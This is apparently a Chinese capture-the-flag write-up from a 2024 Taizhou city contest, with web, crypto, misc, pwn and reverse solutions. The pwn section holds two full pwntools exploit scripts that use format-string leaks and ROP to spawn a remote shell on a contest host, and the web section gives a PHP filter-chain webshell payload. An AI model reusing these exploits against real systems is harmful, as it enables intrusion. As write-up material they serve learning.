2024 台州市赛 部分WriteUp
C3ngH Lv3

Web

DEAD OR ALIVE

php死亡绕过 php伪协议 url二次编码绕过一下

image

这里开启了短tag rot47绕不过去

换成

1
2
php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=upload/shell.php
contents=?%3Chp%20phpipfn(o;)%3E?

得到flag

image

几道菜呀

robotstxt 泄露前半flag

image

后半flag变量覆盖 吧flag污染到变量world里面

image

Crypto

codemaster

爆破得到压缩包密码

hint里面看到压缩包密码

image

听出来摩斯编码

01 0100 0100 011 111 010 101 01 10 100 10 111 0110 0100 01 1011 11 01 101 0 0111 01 1010 101 01 100

001 0100 0100 1000解码得到压缩包密码

1
ALLWORKANDNOPLAYMAKEJACKADULLBOY

得到flag

image

简单的模运算

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
from Crypto.Util.number import *


n1 = 59291291447490366931525634934604732490686993375526804349191888372804657968568621876626267171031639542229776816809231575682674990669907844507573323062869697381007018170369953528533225693260962158277876389797698421883811693774623191453338343873376809325940622690724742325375260783954612111771505452790833107433
e1 = 1009
e2 = 661
c1 = 42985353077188042701858678659683858628193880095538312019081971299029326751867795460043384534976482867850898695817341887974850615883707385265375936859975562647458644154098813749248370155445911231152202411316142174083125556302740642264129017638217154099365335103116579136478977445028803457714891387414804454563
hint2 = 40507463249661310357827794806044375677878316124571340628557074423085821966799760539750240709046644351970536177027127843527257097695964926292300842488261880439240179761636200128317742727421272586463218228015921971356760958631902559531017704907319793768862467740343002694370348402368271531907359292269313167594
hint1 = 1271005879853316066661199285969179445258555468409602536767308127422453124456569166278548456389424001236622134198431700958874184560969387121822195176467698604581027381830540104701755158555395105056691597754287953054854072522855420859550987917092786677237411037800799757596145745139003994853090852244952501770

p=GCD(n1, hint1**e1-e1**(e1*e2)*hint2**e2)

m=pow(c1, inverse(65537, p-1),p)
print(long_to_bytes(m))


n2 = 18907964900655384324579822409386633636878766956056871585535362235214353767231073564264059287914388330411792102199606677008933621408085966756951588469677351070820733406746369679198435269992553170199992317543151904463295431360000467944654613563212110648427484740736780335622922770497302516605477200091994280170659051797483082932715112295285374951466772664058673174457133774539371864037823431076085535646866492867565053211399132137624309571702027870497719709848105717638061824558263209029252939242634210549580025431343041421766587111257036497372428545483704784943228958032869014014563237034417269447643411742587366522581092247139356905151503074118950953726319892565456479517718514001822091970116274032235077283171573739409327260871369017093426482435098823654221146125974831336950435699141428482689352594911360748437075413924102074118643817682988301168832491421799525827632647293700871699768251822202064478207264310344710162587091114198326722398521534722836191900118919600325987668228334387274131745452370144048469165896152934265086085786170745300044244328435656038364921390878141315764940004361350568616343868964642155971232793094529961537868556317288317761237430569785361173933724010332338240102029231307867651913780873895463922404696220328907265969090667253011075715302423364798124784791540343259221981176571491275777227356362593241763735078774750032170810209648159443012857333801615838630780060716065099646497273032317098446052746729617067928763959393487041510168193671378036773409927475705441371588922269531683087325413686315760604906941830110671649667896262119795185372459800672732201403353796496975239081396680894282951703497436899157694531797901273547022181574313676236049710129802224469486290831758140772148263506850711301689866687921384434558768919627058698246307704127709329632785782812326088967419473252484748677712381933762265715476433475653
hint3 = 9939018467626296300864549557153960485816202060115441771858993139956001568094397129213688325169848929397519454556265038265085753791012239390847499832076142790537570688728474176390891119329028306138917962137940523721411683756694953004757356322832322272044727574511946615053360780724964403109981221038321150251912087095566788471973368735984926133539004913163814796547521685779553548417828006578689568287135076606657942555780079060666398892624634539284576783451146414121481315811210373744629102035041262128288541384833388244359092650525684510233998198648220188818529696044589322103131713532522087913277853687802387823370812184861308056607206704924142111163623647400386387795315156552323415775302567837608141240660791558895222250523472575523943334805729177781503647940132538364353380916295244903544529895988952519161034077133368918033027698840291604695794239996491625350827193007237672555853711676946280455422865857083520387962904612732978811244632662722516874510663815000407442709650546583427701935634421822920667340400344464560819496241832753100346158973730178944583819434570015364985334123682718945396012714833234814138060680879946683598382558581755464432848629830671740874556822495651590292355132309556201503702994218748824342270746121842337819752324099307642066174745872761074064496053960340396957873940843698476902239785513353538575271300199803656708789414583304212919858466476111752009816249691548012011325635726932007337584928654763601504911235883280784689919453164650180423494792012285026508211938647974660637499188015435581876228505538395991613265963363970634342709084117396030961729066498695271401095219781344237736883159601430790828530656828799412179649742014177933116928065839153385688599329261957525423958781720021524864279277040500534782586037303978447982579881703150864520067784227584088469267877647284326147128663307302461696049106379396
hint4 = 11497927853957540365332790665731275206952151206861039571536392062632509295957449992678521695139160324432572043863866571073273424766195027066994928026020365890447586873438730677930838694248463784234422970896904779315141100899548415386962349420861970235250438845409060098489028828677789310690303276268227293420117427555062211347687022376226002772552572846005575907377875069559346178573605837280707896716903996273437999304784804469148200034055401729899984732371826562249893238400736560876412526076698397150716407768045925783960626076975474775287357623238930181817744888057241082587725853888247069373763616410186825446631363893872367121719099675878971215427631753890480342562281509217650841316549477101278836516712239644946591434882047908159355119724740895836970093220436696609508084144405957119864577550601265078506824881563233145601502789276574964256487656042156050790935757687533400014492738943377035151940053902285169162559415884261670006407914345470020985548114750984409094762491065523701667910143102554492295526746294891248183460488516919232107982441935261002056298051839186448002917036315086702724337403007094283544108605752353892969499338937456927473502637574082273446631592875576206457590873417790534425052375523311069970894661662935504029122498888677579838832589434264156033809784824308541883139057067073172969579383284214906496081973100504512465134008311849499410830926217663692810810073433508445528894019031624950077917834721653995486872359322444973369269957808220204120434820049177595069822767774880891475045042506316778272385296785381694201967451988353025446019210309412684814041807087081841227290094176745748423008005181412793105824372881451510867905760386180468940263583834371726883151840358399349831450242497969453799407724511831157375792268531837507107779497339624673256413930993867285692700231244480782493119378673295412687014852050209
hint5 = 734693499178140709107482184121639881311481497449164451247514670640712514605734040224535011153519609835276802031782238154113623838563165860055971999265801692161249909520059287311664417036724025637099701450424590923727907132999019020950844342934742235333060614209179570928227493575110697506644022234765949969346518432653798426853947974772328105759741384608693269694

q2=GCD(n2, hint3-hint4)

print(q2)
p2q2=GCD(n2,hint4-q2-hint3)
r=n2//p2q2
print(r)
print(long_to_bytes((hint5-1)//r**2))

# DASCTF{0e88f0e0-f18d-11ee-a56a-38f3abddb69b}

Misc

大ping特ping

CTF-NetA一把梭

image

鼠标不妙题

打开后是300个套娃压缩包,写脚本提取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import os
import zipfile
import uuid
import shutil

def extract_all(zip_path, extract_to, root_directory):
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
for member in zip_ref.namelist():
filename = os.path.basename(member)
if not filename:
continue
source = zip_ref.open(member)
try:
target_path = os.path.join(extract_to, str(uuid.uuid4()) + "_" + filename)
with source, open(target_path, "wb") as target:
shutil.copyfileobj(source, target)
except RuntimeError:
# 如果文件被加密,则将其保存到根目录下
target_path = os.path.join(root_directory, str(uuid.uuid4()) + "_" + filename)
with source, open(target_path, "wb") as target:
shutil.copyfileobj(source, target)

def recursive_unzip(directory, root_directory):
for root, dirs, files in os.walk(directory):
for file in files:
if file.endswith('.zip') and not file.endswith('.dic'):
file_path = os.path.join(root, file)
extract_to = os.path.join(root, os.path.splitext(file)[0])
os.makedirs(extract_to, exist_ok=True)
extract_all(file_path, extract_to, root_directory)
recursive_unzip(extract_to, root_directory)

if __name__ == "__main__":
start_directory = r"\\?\C:\Users\67300\Downloads\11"
recursive_unzip(start_directory, start_directory)

查看python的报错信息和使用everything直接得到最内层的文件

image

image

image

每个压缩包下有一个.dic文件,应该密码就在这300个字典中

写python脚本提取这300个字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import os
import zipfile
import shutil
import tempfile

def extract_zip(zip_path, output_dir):
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
with tempfile.TemporaryDirectory() as temp_dir:
zip_ref.extractall(temp_dir)
for root, _, files in os.walk(temp_dir):
for file in files:
file_path = os.path.join(root, file)
if file.endswith('.zip'):
extract_zip(file_path, output_dir)
elif file.endswith('.dic'):
shutil.move(file_path, os.path.join(output_dir, file))
print(f'Extracted {file} to {output_dir}')

shutil.rmtree(temp_dir)

zip_dir = 'C:/Users/67300/Downloads/鼠标不妙题/'
output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111'

os.makedirs(output_dir, exist_ok=True)

for filename in os.listdir(zip_dir):
if filename.endswith('.zip'):
zip_path = os.path.join(zip_dir, filename)
extract_zip(zip_path, output_dir)
if filename.endswith('.zip'):
zip_path = os.path.join(zip_dir, filename)
extract_zip(zip_path, output_dir)

将300个字典合并成1个,然后跑字典爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import os

output_dir = 'C:/Users/67300/Downloads/鼠标不妙题/111'
combined_file_path = 'C:/Users/67300/Downloads/鼠标不妙题/combined.dic'

with open(combined_file_path, 'w', encoding='utf-8') as combined_file:

for filename in os.listdir(output_dir):
if filename.endswith('.dic'):
dic_file_path = os.path.join(output_dir, filename)

with open(dic_file_path, 'r', encoding='utf-8') as dic_file:
content = dic_file.read()
combined_file.write(content)
combined_file.write('\n')

print(f'All .dic files have been combined into {combined_file_path}')

image

image

看了一下f_几就嵌套几层,可以直接用everything一把梭,找到文件,每个文件是base64的一段

image

image

Pwn

book

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *
context.update(os = 'linux', arch = 'amd64', timeout = 5)
context.log_level = 'debug'
binary = './book'
elf = ELF(binary, checksec=False)
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
else:
libc = ELF('./libc.so.6', checksec=False)
host = '139.155.126.78'
port = '31248'
p = remote(host,port)

sla = lambda delim, data: p.sendlineafter(delim, data)
sa = lambda delim, data: p.sendafter(delim, data)
s = lambda data: p.send(data)
sl = lambda data: p.sendline(data)
ru = lambda delim, **kwargs: p.recvuntil(delim, **kwargs)
io = lambda: p.interactive()

def cmd(idx):
sla(b">>", str(idx).encode())

def fmt(payload):
cmd(2)
sa(b"name:\n", payload)
ru(b"name is:\n")

def attack(payload):
cmd(3)
ru(b"write\n")
s(payload)


def pwn():
fmt("%8$p-%19$p-%13$p")

ru(b"0x")
codebase = int(p.recvn(12), 16) - 0x14a0
ru(b"0x")
libc.address = int(p.recvn(12), 16) - 0x24083
ru(b"0x")
canary = int(p.recvn(16), 16)

system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))
success(f"libc: {libc.address:#x}")

b = codebase + 0x4068
pop_rdi_ret = codebase + 0x0000000000001503
ret = pop_rdi_ret + 1

pay = fmtstr_payload(6, {b : 0x200})
fmt(pay)

pay = b'a'*0x48 + p64(canary) + p64(0) + p64(ret) + p64(pop_rdi_ret) + p64(binsh) + p64(system)
attack(pay)


io()
pwn()

magic_fmt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
from pwn import *
context.update(os = 'linux', arch = 'amd64', timeout = 5)
context.log_level = 'debug'
binary = './magic_fmt'
elf = ELF(binary, checksec=False)
DEBUG = 0
if DEBUG:
libc = elf.libc
p = process(binary)
else:
libc = ELF('./libc.so.6', checksec=False)
host = '139.155.126.78'
port = '37023'
p = remote(host,port)

sla = lambda delim, data: p.sendlineafter(delim, data)
sa = lambda delim, data: p.sendafter(delim, data)
s = lambda data: p.send(data)
sl = lambda data: p.sendline(data)
ru = lambda delim, **kwargs: p.recvuntil(delim, **kwargs)
io = lambda: p.interactive()

def pwn():
ru(b"possess\n")

pay = b'a'*0xe0
s(pay)
ru(b"can ")
ru(b'a'*0xe0)

ret_addr = u64(p.recvn(6).ljust(8, b'\x00')) + 0x8
success(f"ret: {ret_addr:#x}")

ru(b"else?\n")
pay = p64(ret_addr)

s(pay)

ru(b"have?\n")
pay = f"%45$p%{0x68-14}c%6$hhn".encode()
s(pay)

ru(b"magic:\n")
ru(b"0x")
libc.address = int(p.recvn(12), 16) - 0x29d90
pop_rdi_ret = libc.address + 0x000000000002a3e5
ret = pop_rdi_ret + 1
system = libc.sym["system"]
binsh = next(libc.search(b"/bin/sh"))
success(f"libc: {libc.address:#x}")

rsp = ret_addr - 0x118


ru(b"possess\n")
pay = p64(ret_addr) + fit(ret, pop_rdi_ret, binsh, system)
s(pay)

sa(b"else?", pay)

ru(b"have?\n")

rbp_offset = 34

pay = f"%{0x8B}c%6$hhn%{(rsp&0xffff) - 0x8b}c%{rbp_offset}$hn".encode()
# gdb.attach(p, "bbase 0x1327")
s(pay)

io()
pwn()

Reverse

easy_choice

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#include <stdio.h>
#include <stdlib.h>
#define delta 0x9e3779b9
int main()
{
unsigned int w[8] = {0xAC3A28FD, 0x2331590C, 0x329F681B, 0xA6CF62DB, 0x8738A413, 0x44D27414, 0xDEF3A4CD, 0x5B22BA91};//可改
unsigned int v[2];
unsigned int key[4] = {0x41,0x53,0x43,0x54};
unsigned int sum;
unsigned int y,z,p,rounds,e;
int n = 2;
unsigned int key2[4]={0x54,0x4f,0x44,0x41};
for(int o=0;o<4;o++)
{
rounds = 6 + 52/n;
v[0]=w[2*o];
v[1]=w[2*o+1];
sum = rounds*delta;
y = v[0];
do
{
e = sum >> 2 & 3;
for(p=n-1;p>0;p--)
{
z = v[p-1];
v[p] -= ((((z>>5)^(y<<2))+((y>>3)^(z<<4))) ^ ((key[(p&3)^e]^z)+(y ^ sum)));
y = v[p];
}
z = v[n-1];
v[0] -= (((key[(p^e)&3]^z)+(y ^ sum)) ^ (((y<<2)^(z>>5))+((z<<4)^(y>>3))));
y = v[0];
sum -= delta;
}while(--rounds);
rounds = 6 + 52/n;
y = v[0];
sum = rounds*delta;
do
{
e = sum >> 2 & 3;
for(p=n-1;p>0;p--)
{
z = v[p-1];
v[p] -= ((((z>>5)^(y<<2))+((y>>3)^(z<<4))) ^ ((key2[(p&3)^e]^z)+(y ^ sum)));
y = v[p];
}
z = v[n-1];
v[0] -= (((key2[(p^e)&3]^z)+(y ^ sum)) ^ (((y<<2)^(z>>5))+((z<<4)^(y>>3))));
y = v[0];
sum = sum-delta;
}while(--rounds);
w[2*o]=v[0];
w[2*o+1]=v[1];
}
for(int i=0;i<8;i++)
{
printf("%c%c%c%c",*((char*)&w[i]+0),*((char*)&w[i]+1),*((char*)&w[i]+2),*((char*)&w[i]+3));
}
return 0;
}
 评论
评论插件加载失败
正在加载评论插件
总字数 77.8k 访客数 访问量